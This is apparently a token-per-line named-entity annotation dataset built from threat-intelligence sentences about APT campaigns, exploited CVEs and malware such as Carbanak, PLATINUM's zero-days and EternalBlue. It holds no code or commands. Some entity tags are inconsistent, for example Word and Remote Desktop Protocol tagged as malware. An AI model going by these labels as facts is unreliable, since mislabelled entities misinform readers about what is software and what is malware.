O + +The O +Word S-TOOL +document O +usually O +exploits O +CVE-2012-0158 S-VULID +. O + +Sometimes O +the O +attackers S-APT +send O +an O +MS B-FILE +PowerPoint I-FILE +document E-FILE +instead O +, O +which O +exploits O +CVE-2014-6352 S-VULID +. O + +Sometimes O +Patchwork S-APT +send O +an O +MS B-FILE +PowerPoint I-FILE +document E-FILE +instead O +, O +which O +exploits O +CVE-2014-6352 S-VULID +. O + +The O +malicious O +documents O +that O +Unit B-SECTEAM +42 E-SECTEAM +examined O +contained O +legitimate O +decoy O +lures O +as O +well O +as O +malicious O +embedded O +EPS B-FILE +files E-FILE +targeting O +the O +CVE-2015-2545 S-VULID +and O +CVE-2017-0261 S-VULID +vulnerabilities O +. O + +One O +of O +the O +favorite O +methods O +used O +by O +the O +Pitty B-APT +Tiger I-APT +group E-APT +to O +infect O +users O +is O +to O +use O +a O +Microsoft B-FILE +Office I-FILE +Word I-FILE +document E-FILE +which O +exploits O +a O +specific O +vulnerability O +( O +CVE-2012-0158 S-VULID +) O +. O + +The O +document O +, O +when O +opened O +, O +used O +an O +embedded O +ActiveX B-MAL +control E-MAL +to O +download O +a O +JavaScript B-FILE +file E-FILE +from O +a O +remote O +site O +that O +used O +a O +previously O +unknown O +vulnerability O +in O +some O +versions O +of O +Windows S-OS +( O +later O +designated O +CVE-2013-7331 S-VULID +) O +to O +read O +information O +about O +the O +browser O +'s O +installed O +components O +. O + +The O +document B-FILE +files E-FILE +exploit S-VULNAME +at O +least O +three O +known O +vulnerabilities S-VULNAME +in O +Microsoft S-IDTY +Office O +, O +which O +we O +discuss O +in O +the O +Infection O +Techniques O +section O +. 
O + +In O +all O +emails S-TOOL +sent O +to O +these O +government B-IDTY +officials E-IDTY +, O +the O +actor O +used O +the O +same O +attachment O +: O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +document E-FILE +that O +exploited O +the O +CVE-2012-0158 S-VULID +vulnerability O +to O +drop O +a O +malicious O +payload O +. O + +According O +to O +the O +security B-IDTY +firm E-IDTY +, O +this O +campaign O +targeted O +Indian O +military B-IDTY +officials E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +, O +distributing O +spyware O +to O +its O +victims O +via O +an O +Adobe B-TOOL +Reader E-TOOL +vulnerability S-VULNAME +. O + +PLATINUM S-APT +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +The O +group O +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +We O +believe O +that O +the O +Carbanak S-MAL +campaign O +is O +a O +clear O +indicator O +of O +a O +new O +era O +in O +cybercrime O +in O +which O +criminals S-APT +use O +APT B-ACT +techniques E-ACT +directly O +against O +the O +financial B-IDTY +industry E-IDTY +instead O +of O +through O +its O +customers S-IDTY +. O + +Carbanak S-MAL +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. 
O + +However O +, O +in O +September S-TIME +last O +year O +, O +our O +friends O +at O +CSIS S-SECTEAM +published O +a O +blog O +detailing O +a O +new O +Carbanak S-MAL +variant O +affecting O +one O +of O +its O +customers S-IDTY +. O + +PIVY S-MAL +also O +played O +a O +key O +role O +in O +the O +2011 B-ACT +campaign E-ACT +known O +as O +Nitro O +that O +targeted O +chemical B-IDTY +makers E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +and O +human O +rights O +groups.10,11 O +Still O +active O +a O +year O +later O +, O +the O +Nitro O +attackers S-APT +used O +a O +zero-day S-VULNAME +vulnerability O +in O +Java O +to O +deploy O +PIVY S-MAL +in O +2012 S-TIME +. O + +Each O +of O +the O +spear B-ACT +phishing I-ACT +attacks E-ACT +contained O +links O +to O +.doc B-MAL +files E-MAL +, O +which O +were O +really O +RTF B-FILE +documents E-FILE +that O +attempt O +to O +exploit S-VULNAME +CVE-2017-8570 S-VULID +( O +Composite B-TOOL +Moniker E-TOOL +) O +. O + +The O +Word S-TOOL +document O +usually O +exploits O +CVE-2012-0158 S-VULID +. O + +Sometimes O +the O +attackers S-APT +send O +an O +MS B-FILE +PowerPoint I-FILE +document E-FILE +instead O +, O +which O +exploits O +CVE-2014-6352 S-VULID +. O + +Sometimes O +Patchwork S-APT +send O +an O +MS B-FILE +PowerPoint I-FILE +document E-FILE +instead O +, O +which O +exploits O +CVE-2014-6352 S-VULID +. O + +The O +malicious O +documents O +that O +Unit B-SECTEAM +42 E-SECTEAM +examined O +contained O +legitimate O +decoy O +lures O +as O +well O +as O +malicious O +embedded O +EPS B-FILE +files E-FILE +targeting O +the O +CVE-2015-2545 S-VULID +and O +CVE-2017-0261 S-VULID +vulnerabilities O +. 
O + +Older O +documents O +used O +by O +Patchwork S-APT +focused O +on O +the O +CVE-2017-0261 S-VULID +vulnerability O +, O +however O +in O +late B-TIME +January I-TIME +2018 E-TIME +when O +, O +paradoxically O +, O +newer O +documents O +abandoned O +this O +vulnerability O +to O +attack O +the O +older O +CVE-2015-2545 S-VULID +vulnerability O +. O + +PittyTiger S-APT +has O +also O +been O +seen O +using O +Heartbleed B-VULNAME +vulnerability E-VULNAME +in O +order O +to O +directly O +get O +valid O +credentials O +. O + +They O +have O +also O +been O +seen O +using O +Heartbleed B-VULNAME +vulnerability E-VULNAME +in O +order O +to O +directly O +get O +valid O +credentials O +. O + +One O +of O +the O +favorite O +methods O +used O +by O +the O +Pitty B-APT +Tiger I-APT +group E-APT +to O +infect O +users O +is O +to O +use O +a O +Microsoft B-FILE +Office I-FILE +Word I-FILE +document E-FILE +which O +exploits O +a O +specific O +vulnerability O +( O +CVE-2012-0158 S-VULID +) O +. O + +PittyTiger S-APT +could O +also O +use O +CVE-2014-1761 S-VULID +, O +which O +is O +more O +recent O +. O + +PLATINUM S-APT +is O +known O +to O +have O +used O +a O +number O +of O +zero-day S-VULNAME +exploits O +, O +for O +which O +no O +security O +update O +is O +available O +at O +the O +time O +of O +transmission O +, O +in O +these O +attempts O +. O + +The O +document O +, O +when O +opened O +, O +used O +an O +embedded O +ActiveX B-MAL +control E-MAL +to O +download O +a O +JavaScript B-FILE +file E-FILE +from O +a O +remote O +site O +that O +used O +a O +previously O +unknown O +vulnerability O +in O +some O +versions O +of O +Windows S-OS +( O +later O +designated O +CVE-2013-7331 S-VULID +) O +to O +read O +information O +about O +the O +browser O +'s O +installed O +components O +. 
O + +When O +the O +document O +was O +opened O +in O +Word S-MAL +, O +PLATINUM S-APT +exploited O +a O +previously O +unknown O +vulnerability O +in O +the O +Microsoft S-IDTY +Office O +PostScript O +interpreter O +( O +designated O +CVE-2015-2545 S-VULID +) O +that O +enabled O +it O +to O +execute O +the O +attacker S-APT +'s O +code O +and O +drop O +an O +attacker-generated O +malicious B-ACT +DLL E-ACT +onto O +the O +computer O +. O + +The O +DLL S-MAL +exploited O +another O +previously O +unknown O +vulnerability O +( O +designated O +CVE-2015-2546 S-VULID +) O +in O +the O +Windows S-OS +kernel O +, O +which O +enabled O +it O +to O +elevate O +privileges O +for O +the O +Word S-MAL +executable O +and O +subsequently O +install O +a O +backdoor O +through O +the O +application O +. O + +When O +the O +document O +was O +opened O +in O +Word S-MAL +, O +it O +exploited O +a O +previously O +unknown O +vulnerability O +in O +the O +Microsoft S-IDTY +Office O +PostScript O +interpreter O +( O +designated O +CVE-2015-2545 S-VULID +) O +that O +enabled O +it O +to O +execute O +the O +attacker S-APT +'s O +code O +and O +drop O +an O +attacker-generated O +malicious B-ACT +DLL E-ACT +onto O +the O +computer O +. O + +In O +total O +, O +PLATINUM S-APT +made O +use O +of O +four O +zero-day S-VULNAME +exploits O +during O +these O +two O +attack B-ACT +campaigns E-ACT +( O +two O +remote B-ACT +code I-ACT +execution E-ACT +bugs O +, O +one O +privilege O +escalation O +, O +and O +one O +information O +disclosure O +) O +, O +showing O +an O +ability O +to O +spend O +a O +non-trivial O +amount O +of O +resources O +to O +either O +acquire O +professionally O +written O +zero-day S-VULNAME +exploits O +from O +unknown O +markets O +, O +or O +research O +and O +utilize O +the O +zero-day S-VULNAME +exploits O +themselves O +. O + +PLATINUM S-APT +has O +used O +several O +zero-day S-VULNAME +exploits O +against O +their O +victims O +. 
O + +Even O +if O +CVE-2015-2546 S-VULID +affected O +Windows S-OS +10 O +, O +the O +exploitation O +would O +have O +required O +much O +more O +technical O +prowess O +to O +succeed O +; O +ultimately O +, O +SMEP O +makes O +it O +more O +difficult O +for O +attackers S-APT +. O + +For O +example O +, O +one O +zero-day S-VULNAME +vulnerability O +exploit S-VULNAME +( O +CVE-2015-2545 S-VULID +) O +used O +by O +PLATINUM S-APT +was O +addressed O +immediately O +in O +September B-TIME +2015 E-TIME +. O + +It O +possesses O +a O +wide O +range O +of O +technical B-MAL +exploitation I-MAL +capabilities E-MAL +, O +significant O +resources O +for O +researching O +or O +purchasing O +complicated O +zero-day S-VULNAME +exploits O +, O +the O +ability O +to O +sustain O +persistence O +across O +victim O +networks O +for O +years O +, O +and O +the O +manpower O +to O +develop O +and O +maintain O +a O +large O +number O +of O +tools O +to O +use O +within O +unique O +victim O +networks O +. O + +In O +2016 S-TIME +, O +an O +attack B-ACT +campaign E-ACT +by O +this O +group O +was O +recorded O +in O +early B-TIME +May E-TIME +that O +made O +use O +of O +an O +exploit S-VULNAME +for O +CVE-2016-4117 S-VULID +, O +a O +vulnerability O +in O +Adobe O +Flash S-TOOL +Player O +, O +which O +at O +the O +time O +was O +both O +unknown O +and O +unpatched O +. O + +To O +deliver O +the O +malware O +to O +the O +victim O +machines O +, O +the O +Rocke S-APT +group O +exploits O +vulnerabilities S-VULNAME +in O +Apache O +Struts O +2 O +, O +Oracle B-TOOL +WebLogic E-TOOL +, O +and O +Adobe B-TOOL +ColdFusion E-TOOL +. O + +However O +, O +around O +a O +month O +ago O +, O +Rocke S-APT +started O +targeting O +systems O +that O +run O +Jenkins O +by O +attempting O +to O +exploit S-VULNAME +CVE-2018-1000861 S-VULID +and O +CVE-2019-1003000 S-VULID +. 
O + +The O +Shadow O +Brokers O +first O +emerged O +in O +August S-TIME +, O +when O +they O +posted O +links O +to O +a O +selection O +of O +NSA S-TOOL +exploits S-VULNAME +and O +hacking O +tools O +onto O +Github O +and O +other O +websites O +. O + +In O +April S-TIME +, O +2018 S-TIME +, O +the O +360 B-SECTEAM +Core I-SECTEAM +Security E-SECTEAM +takes O +the O +lead O +in O +capturing O +the O +APT-C-06 S-APT +group’s O +new O +APT O +attack O +using O +0-day S-VULNAME +vulnerabilities O +CVE-2018-8174 S-VULID +in O +the O +wild O +. O + +The O +group O +has O +demonstrated O +access O +to O +zero-day S-VULNAME +vulnerabilities O +CVE-2018-0802 S-VULID +, O +and O +the O +ability O +to O +incorporate O +them O +into O +operations O +. O + +FireEye S-SECTEAM +observed O +a O +high O +volume O +of O +activity O +associated O +with O +the O +exploitation O +of O +CVE-2017-10271 S-VULID +following O +the O +public O +posting O +of O +proof O +of O +concept O +code O +in O +December B-TIME +2017 E-TIME +. O + +If O +the O +lateral O +movement O +with O +credentials O +fails O +, O +then O +the O +malware O +uses O +PingCastle B-MAL +MS17-010 E-MAL +scanner O +(PingCastle O +is O +a O +French S-LOC +Active O +Directory O +security O +tool) O +to O +scan O +that O +particular O +host O +to O +determine O +if O +its O +vulnerable O +to O +EternalBlue S-VULNAME +, O +and O +uses O +it O +to O +spread O +to O +that O +host O +. O + +Tactic O +#1: O +Delivering O +the O +miner O +directly O +to O +a O +vulnerable O +serverSome O +tactics O +we've O +observed O +involve O +exploiting O +CVE-2017-10271 S-VULID +, O +leveraging O +PowerShell S-MAL +to O +download O +the O +miner O +directly O +onto O +the O +victim’s O +system O +(Figure O +1) O +, O +and O +executing S-ACT +it O +using B-ACT +ShellExecute() E-ACT +. 
O + +We O +assess O +that O +the O +actors O +employing O +this O +latest O +Flash S-TOOL +zero-day S-VULNAME +are O +a O +suspected O +North B-LOC +Korean E-LOC +group O +we O +track O +as O +TEMP.Reaper S-APT +. O + +Figure O +2: O +Zyklon S-APT +attack O +flowInfection O +Techniques O +CVE-2017-8759 S-VULID +. O + +This O +vulnerability S-VULNAME +was O +discovered O +by O +FireEye S-SECTEAM +in O +September B-TIME +2017 E-TIME +, O +and O +it O +is O +a O +vulnerability O +we O +have O +observed O +being O +exploited O +in O +the O +wild O +. O + +Figure O +3: O +Embedded O +URL O +in O +OLE O +object O +CVE-2017-11882 S-VULID +Similarly O +, O +we O +have O +also O +observed O +actors S-APT +leveraging O +another O +recently O +discovered O +vulnerability O +CVE-2017-11882 S-VULID +in O +Microsoft S-IDTY +Office O +. O + +The O +other O +overlapping O +files O +are O +tools O +used O +by O +the O +adversary O +to O +locate O +other O +systems O +on O +the O +network O +( O +etool.exe S-FILE +) O +, O +check O +to O +see O +if O +they O +are O +vulnerable O +to O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +patched O +in O +MS07-010 S-FILE +( O +checker1.exe S-FILE +) O +and O +pivot O +to O +them O +using O +remote O +execution O +functionality O +offered O +by O +a O +tool O +similar O +to O +PsExec S-TOOL +offered O +by O +Impacket S-TOOL +( O +psexec.exe S-FILE +) O +. O + +The O +files O +uploaded O +to O +this O +webshell O +included O +the O +same O +compiled O +python B-MAL +script E-MAL +that O +would O +scan O +remote O +systems O +that O +were O +vulnerable O +to O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +that O +we O +saw O +uploaded O +to O +the O +other O +errr.aspx S-FILE +webshell O +. 
O + +We O +believe O +the O +actors S-APT +pivoted O +to O +other O +systems O +on O +the O +network O +using O +stolen B-ACT +credentials E-ACT +and O +by O +exploiting O +the O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +vulnerability O +patched O +in O +MS17-010 S-FILE +. O + +Code O +contained O +inside O +one O +of O +the O +slides S-FILE +triggers O +an O +exploit S-VULNAME +for O +CVE-2017-8759 S-VULID +, O +a O +remote O +code O +execution O +vulnerability O +in O +Microsoft B-TOOL +.NET I-TOOL +framework E-TOOL +. O + +According O +to O +FireEye S-SECTEAM +, O +the O +admin@338 S-APT +sent O +out O +emails S-TOOL +containing O +malicious O +documents O +designed O +to O +exploit S-VULNAME +Microsoft B-IDTY +Office E-IDTY +vulnerabilities S-VULNAME +in O +an O +effort O +to O +deliver O +a O +piece O +of O +malware O +dubbed O +LOWBALL S-MAL +. O + +According O +to O +FireEye S-SECTEAM +, O +the O +attackers S-APT +sent O +out O +emails S-TOOL +containing O +malicious O +documents O +designed O +to O +exploit S-VULNAME +Microsoft B-IDTY +Office E-IDTY +vulnerabilities S-VULNAME +in O +an O +effort O +to O +deliver O +a O +piece O +of O +malware O +dubbed O +LOWBALL S-MAL +. O + +Similar O +to O +RIPTIDE B-ACT +campaigns E-ACT +, O +APT12 S-APT +infects O +target O +systems O +with O +HIGHTIDE S-MAL +using O +a O +Microsoft B-TOOL +Word E-TOOL +( O +.doc S-FILE +) O +document O +that O +exploits O +CVE-2012-0158 S-VULID +. O + +The O +Sofacy B-APT +group E-APT +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. O + +APT28 S-APT +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. 
O + +The O +group O +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. O + +APT28 S-APT +is O +using O +novel O +techniques O +involving O +the O +EternalBlue S-VULNAME +exploits S-VULNAME +and O +the O +open B-MAL +source I-MAL +tool E-MAL +Responder S-MAL +to O +spread O +laterally O +through O +networks O +and O +likely O +target O +travelers O +. O + +The O +JHUHUGIT S-MAL +implant O +became O +a O +relatively O +popular O +first O +stage O +for O +the O +Sofacy B-ACT +attacks E-ACT +and O +was O +used O +again O +with O +a O +Java S-TOOL +zero-day S-VULNAME +( O +CVE-2015-2590 S-VULID +) O +in O +July B-TIME +2015 E-TIME +. O + +We O +are O +however O +only O +aware O +of O +one O +instance O +- O +the O +exploitation O +of O +CVE-2013-0640 S-VULID +to O +deploy O +MiniDuke S-MAL +- O +where O +we O +believe O +the O +exploited O +vulnerability O +was O +a O +zero-day S-VULNAME +at O +the O +time O +that O +the O +group O +acquired O +the O +exploit S-VULNAME +. O + +FireEye S-SECTEAM +confirmed O +that O +since O +at O +least O +November B-TIME +2017 E-TIME +, O +APT37 S-APT +exploited O +a O +zero-day S-VULNAME +Adobe B-TOOL +Flash E-TOOL +vulnerability O +, O +CVE-2018-4878 S-VULID +, O +to O +distribute O +DOGCALL S-MAL +malware S-MAL +to O +South B-LOC +Korean E-LOC +victims O +. O + +FireEye B-SECTEAM +iSIGHT I-SECTEAM +Intelligence E-SECTEAM +confirmed O +that O +since O +at O +least O +November B-TIME +2017 E-TIME +, O +APT37 S-APT +exploited O +a O +zero-day S-VULNAME +Adobe B-TOOL +Flash E-TOOL +vulnerability O +, O +CVE-2018-4878 S-VULID +, O +to O +distribute O +DOGCALL S-MAL +malware S-MAL +to O +South B-LOC +Korean E-LOC +victims O +. 
O + +A O +well-funded O +, O +highly O +active O +group O +of O +Middle B-LOC +Eastern E-LOC +hackers O +was O +caught O +, O +yet O +again O +, O +using O +a O +lucrative O +zero-day S-VULNAME +exploit S-VULNAME +in O +the O +wild O +to O +break O +into O +computers O +and O +infect O +them O +with O +powerful O +spyware O +developed O +by O +an O +infamous O +cyberweapons O +dealer O +named O +Gamma B-APT +Group E-APT +. O + +A O +well-funded O +, O +highly O +active O +BlackOasis B-APT +group E-APT +of O +Middle B-LOC +Eastern E-LOC +hackers O +was O +caught O +, O +yet O +again O +, O +using O +a O +lucrative O +zero-day S-VULNAME +exploit S-VULNAME +in O +the O +wild O +to O +break O +into O +computers O +and O +infect O +them O +with O +powerful O +spyware O +developed O +by O +an O +infamous O +cyberweapons O +dealer O +named O +Gamma B-APT +Group E-APT +. O + +Kaspersky S-SECTEAM +found O +the O +BlackOasis B-APT +group E-APT +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. O + +Kaspersky S-SECTEAM +found O +the O +group O +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. 
O + +BRONZE B-APT +BUTLER E-APT +has O +demonstrated O +the O +ability O +to O +identify O +a O +significant O +zero-day S-VULNAME +vulnerability O +within O +a O +popular O +Japanese S-LOC +corporate O +tool O +and O +then O +use O +scan-and-exploit B-ACT +techniques E-ACT +to O +indiscriminately O +compromise O +Japanese S-LOC +Internet-facing O +enterprise O +systems O +. O + +The O +group O +has O +demonstrated O +the O +ability O +to O +identify O +a O +significant O +zero-day S-VULNAME +vulnerability O +within O +a O +popular O +Japanese S-LOC +corporate O +tool O +and O +then O +use O +scan-and-exploit B-ACT +techniques E-ACT +to O +indiscriminately O +compromise O +Japanese S-LOC +Internet-facing O +enterprise O +systems O +. O + +BRONZE B-APT +BUTLER E-APT +has O +used O +phishing B-ACT +emails S-TOOL +with O +Flash S-TOOL +animation O +attachments O +to O +download O +and O +execute O +Daserf S-MAL +malware S-MAL +, O +and O +has O +also O +leveraged O +Flash S-TOOL +exploits S-VULNAME +for O +SWC B-ACT +attacks E-ACT +. O + +The O +group O +has O +used O +phishing B-ACT +emails S-TOOL +with O +Flash S-TOOL +animation O +attachments O +to O +download O +and O +execute O +Daserf S-MAL +malware S-MAL +, O +and O +has O +also O +leveraged O +Flash S-TOOL +exploits S-VULNAME +for O +SWC B-ACT +attacks E-ACT +. O + +While O +investigating O +a O +2016 S-TIME +intrusion O +, O +Secureworks S-SECTEAM +identified O +BRONZE B-APT +BUTLER E-APT +exploiting O +a O +then-unpatched O +remote B-ACT +code I-ACT +execution E-ACT +vulnerability O +( O +CVE-2016-7836 S-VULID +) O +in O +SKYSEA O +Client O +View O +, O +a O +popular O +Japanese S-LOC +product O +used O +to O +manage O +an O +organization O +. 
O + +While O +investigating O +a O +2016 S-TIME +intrusion O +, O +Secureworks S-SECTEAM +incident O +responders O +identified O +BRONZE B-APT +BUTLER E-APT +exploiting O +a O +then-unpatched O +remote B-ACT +code I-ACT +execution E-ACT +vulnerability O +( O +CVE-2016-7836 S-VULID +) O +in O +SKYSEA O +Client O +View O +, O +a O +popular O +Japanese S-LOC +product O +used O +to O +manage O +an O +organization O +. O + +Carbanak S-MAL +is O +a O +remote O +backdoor O +( O +initially O +based O +on O +Carberp S-MAL +) O +, O +designed O +for O +espionage S-ACT +, O +data O +Exfiltration S-ACT +and O +to O +provide O +remote O +access O +to O +infected O +machines O +. O + +If O +found O +on O +the O +target O +system O +, O +Carbanak S-MAL +will O +try O +to O +exploit S-VULNAME +a O +known O +vulnerability O +in O +Windows S-OS +XP O +, O +Windows S-OS +Server O +2003 O +, O +Windows S-OS +Vista O +, O +Windows S-OS +Server O +2008 O +, O +Windows S-OS +7 O +, O +Windows S-OS +8 O +, O +and O +Windows S-OS +Server O +2012 O +, O +CVE-2013-3660 S-VULID +, O +for O +local O +privilege O +escalation O +. O + +To O +enable O +connections O +to O +the O +infected O +computer O +using O +the O +Remote B-MAL +Desktop I-MAL +Protocol E-MAL +( O +RDP S-MAL +) O +, O +Carbanak S-MAL +sets O +Termservice O +service O +execution O +mode O +to O +Auto O +. O + +Carbanak S-MAL +is O +also O +aware O +of O +the O +IFOBS O +banking O +application O +and O +can O +, O +on O +command O +, O +substitute O +the O +details O +of O +payment O +documents O +in O +the O +IFOBS O +system O +. O + +Sensitive O +bank O +documents O +have O +be O +found O +on O +the O +servers O +that O +were O +controlling O +Carbanak S-MAL +. 
O + +Existing O +telemetry O +indicates O +that O +the O +Carbanak S-MAL +attackers S-APT +are O +trying O +to O +expand O +operations O +to O +other O +Baltic S-LOC +and O +Central B-LOC +Europe E-LOC +countries O +, O +the O +Middle B-LOC +East E-LOC +, O +Asia S-LOC +and O +Africa S-LOC +. O + +We O +believe O +that O +the O +Carbanak S-MAL +campaign O +is O +a O +clear O +indicator O +of O +a O +new O +era O +in O +cybercrime O +in O +which O +criminals S-APT +use O +APT B-ACT +techniques E-ACT +directly O +against O +the O +financial B-IDTY +industry E-IDTY +instead O +of O +through O +its O +customers S-IDTY +. O + +This O +report O +describes O +the O +details O +and O +type O +of O +operations O +carried O +out O +by O +Carbanak S-MAL +that O +focuses O +on O +financial B-IDTY +industry E-IDTY +, O +such O +as O +payment B-IDTY +providers E-IDTY +, O +retail B-IDTY +industry E-IDTY +and O +PR B-IDTY +companies E-IDTY +. O + +Carbanak S-MAL +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +From O +2013 S-TIME +Carbanak S-MAL +intensified O +its O +activity O +focused O +on O +banks S-IDTY +and O +electronic B-IDTY +payment E-IDTY +systems O +in O +Russia S-LOC +and O +in O +the O +post-Soviet S-LOC +space S-IDTY +. O + +Since O +2013 S-TIME +Carbanak S-MAL +has O +successfully O +gained O +access O +to O +networks O +of O +more O +than O +50 O +banks S-IDTY +and O +5 O +payment B-IDTY +systems E-IDTY +. 
O + +To O +reduce O +the O +risk O +of O +losing O +access O +to O +the O +internal O +bank O +network O +, O +the O +Carbanak S-MAL +, O +in O +addition O +to O +malicious O +programs O +, O +also O +used O +for O +remote O +access O +legitimate O +programs O +such O +as O +Ammy B-MAL +Admin E-MAL +and O +Team B-MAL +Viewer E-MAL +. O + +Additionally O +the O +reports O +on O +Carbanak S-MAL +show O +a O +different O +picture O +, O +where O +banks S-IDTY +targeted O +outside O +of O +Russia S-LOC +, O +specifically O +Europe S-LOC +, O +USA S-LOC +and O +Japan S-LOC +are O +mentioned O +, O +which O +does O +not O +match O +our O +research O +. O + +These O +attacks O +have O +included O +criminal B-APT +groups E-APT +responsible O +for O +the O +delivery O +of O +NewPosThings O +, O +MalumPOS O +and O +PoSeidon S-APT +point O +of O +sale O +Malware O +, O +as O +well O +as O +Carbanak S-MAL +from O +the O +Russian S-LOC +criminal B-APT +organization E-APT +we O +track O +as O +Carbon B-APT +Spider E-APT +. O + +The O +leader O +of O +the O +crime B-APT +gang E-APT +behind O +the O +Carbanak S-MAL +and O +Cobalt B-ACT +malware I-ACT +attacks E-ACT +targeting O +over O +a O +100 O +financial B-IDTY +institutions E-IDTY +worldwide O +has O +been O +arrested O +in O +Alicante O +, O +Spain S-LOC +, O +after O +a O +complex O +investigation O +conducted O +by O +the O +Spanish O +National O +Police O +. O + +Since O +2013 S-TIME +, O +the O +cybercrime B-APT +gang E-APT +have O +attempted O +to O +attack O +banks S-IDTY +, O +e-payment S-IDTY +systems O +and O +financial B-IDTY +institutions E-IDTY +using O +pieces O +of O +malware O +they O +designed O +, O +known O +as O +Carbanak S-MAL +and O +Cobalt S-MAL +. 
O + +Other O +public O +tools O +used O +by O +the O +CopyKittens S-APT +are O +Metasploit S-MAL +, O +a O +well-known O +free O +and O +open O +source O +framework O +for O +developing O +and O +executing O +exploit S-VULNAME +code O +against O +a O +remote O +target O +machine O +; O +Mimikatz S-MAL +, O +a O +post-exploitation O +tool O +that O +performs O +credential O +dumping O +; O +and O +Empire S-MAL +, O +a O +PowerShell S-MAL +and O +Python S-TOOL +post-exploitation O +agent O +. O + +Just O +a O +few O +months O +later O +, O +in O +February B-TIME +2015 E-TIME +, O +we O +announced O +the O +discovery O +of O +Carbanak S-MAL +, O +a O +cyber-criminal B-APT +gang E-APT +that O +used O +custom O +malware O +and O +APT B-ACT +techniques E-ACT +to O +steal O +millions O +of O +dollars O +while O +infecting O +hundreds O +of O +financial B-IDTY +institutions E-IDTY +in O +at O +least O +30 O +countries O +. O + +However O +, O +in O +September S-TIME +last O +year O +, O +our O +friends O +at O +CSIS S-SECTEAM +published O +a O +blog O +detailing O +a O +new O +Carbanak S-MAL +variant O +affecting O +one O +of O +its O +customers S-IDTY +. O + +In O +one O +remarkable O +case O +, O +the O +Carbanak S-MAL +2.0 O +gang O +used O +its O +access O +to O +a O +financial B-IDTY +institution E-IDTY +that O +stores O +information O +about O +shareholders O +to O +change O +the O +ownership O +details O +of O +a O +large O +company O +. O + +This O +Gorgon B-ACT +Group I-ACT +campaign E-ACT +leveraged O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +Microsoft B-FILE +Word I-FILE +documents E-FILE +exploiting O +CVE-2017-0199 S-VULID +. 
O + +Ke3chang S-APT +has O +also O +leveraged O +a O +Java S-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2012-4681 S-VULID +) O +, O +as O +well O +as O +older O +, O +reliable O +exploits O +for O +Microsoft B-FILE +Word E-FILE +( O +CVE-2010-3333 S-VULID +) O +and O +Adobe B-MAL +PDF I-MAL +Reader E-MAL +( O +CVE-2010-2883 S-VULID +) O +. O + +While O +the O +URL O +acts O +similarly O +to O +how O +eye-watch.in O +: O +443 O +delivers O +payloads O +, O +we O +also O +saw O +the O +URL O +leveraging O +and O +exploiting O +security O +flaws O +in O +Flash S-TOOL +: O +CVE-2015-8651 S-VULID +, O +CVE-2016-1019 S-VULID +, O +and O +CVE-2016-4117 S-VULID +. O + +The O +exploit S-VULNAME +, O +which O +takes O +advantage O +of O +CVE-2018-4878 S-VULID +, O +allows O +an O +attacker S-APT +to O +execute O +arbitrary O +code O +such O +as O +an O +implant O +. O + +Documents S-FILE +with O +the O +flash S-TOOL +exploit S-VULNAME +managed O +to O +evade O +static O +defenses O +and O +remain O +undetected O +as O +an O +exploit S-VULNAME +on O +VirusTotal S-TOOL +. O + +WannaCry S-MAL +utilizes O +EternalBlue S-VULNAME +by O +crafting O +a O +custom O +SMB S-MAL +session O +request O +with O +hard-coded O +values O +based O +on O +the O +target O +system O +. O + +WannaCry S-MAL +leverages O +an O +exploit S-VULNAME +, O +codenamed O +" O +EternalBlue S-VULNAME +" O +, O +that O +was O +released O +by O +the O +Shadow B-APT +Brokers E-APT +on O +April B-TIME +14 I-TIME +, I-TIME +2017 E-TIME +. O + +Microsoft S-IDTY +addressed O +the O +SMBv1 S-TOOL +vulnerabilities S-VULNAME +in O +March B-TIME +2017 E-TIME +with O +Security O +Bulletin O +MS17-010 O +. O + +The O +worm O +leverages O +an O +SMBv1 B-TOOL +exploit S-VULNAME +that O +originates O +from O +tools O +released O +by O +the O +Shadow B-APT 